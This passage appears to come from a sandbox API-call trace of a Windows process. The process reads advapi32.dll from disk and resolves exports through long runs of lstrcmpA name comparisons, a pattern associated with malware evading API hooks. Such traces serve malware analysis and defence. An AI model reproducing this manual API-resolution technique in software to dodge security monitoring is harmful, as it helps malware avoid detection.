lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0200.216] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0200.217] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0200.217] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0200.217] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0200.218] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0200.218] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0200.219] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0200.219] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0200.219] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0200.219] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0200.219] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0200.219] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0200.219] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0200.219] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0200.219] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0200.219] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0200.219] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0200.219] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.219] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0200.219] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.219] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0200.219] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0200.219] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0200.219] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0200.219] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0200.219] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0200.220] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0200.220] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0200.220] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0200.220] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0200.220] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0200.220] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0200.220] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0200.220] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0200.220] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0200.220] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0200.220] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.220] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0200.221] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.221] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0200.221] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0200.221] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0200.221] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0200.221] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0200.221] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0200.221] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0200.221] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0200.221] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0200.221] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0200.597] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0200.597] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0200.597] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0200.597] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0200.597] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0200.597] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0200.597] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0200.597] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.597] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0200.597] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.597] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0200.597] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0200.597] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0200.598] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0200.598] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0200.598] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0200.598] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0200.598] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0200.598] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0200.598] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0200.598] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0200.598] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0200.598] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0200.598] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0200.598] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0200.598] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0200.598] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0200.598] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0200.598] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0200.598] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0200.598] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0200.598] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0200.598] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0200.599] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0200.599] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0200.599] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0200.599] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0200.599] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0200.599] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0200.599] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0200.599] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0200.599] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0200.599] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0200.599] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0200.619] GetProcessHeap () returned 0x570000 [0200.619] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x410e040 | out: hHeap=0x570000) returned 1 [0201.002] GetProcessHeap () returned 0x570000 [0201.002] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x589360 [0201.003] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0201.003] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0201.003] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0201.004] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0201.004] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0201.005] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0201.005] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0201.005] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0201.005] GetProcessHeap () returned 0x570000 [0201.005] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa3ef0) returned 0x2d42010 [0201.007] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0201.007] ReadFile (in: hFile=0x140, lpBuffer=0x2d42010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d42010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0201.032] CloseHandle (hObject=0x140) returned 1 [0201.032] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0201.033] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0201.033] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0201.033] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0201.033] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0201.033] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0201.033] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0201.033] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0201.033] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0201.033] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0201.034] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0201.034] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0201.034] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0201.035] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0201.035] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0201.035] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0201.035] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0201.036] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0201.037] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0201.038] lstrcmpA 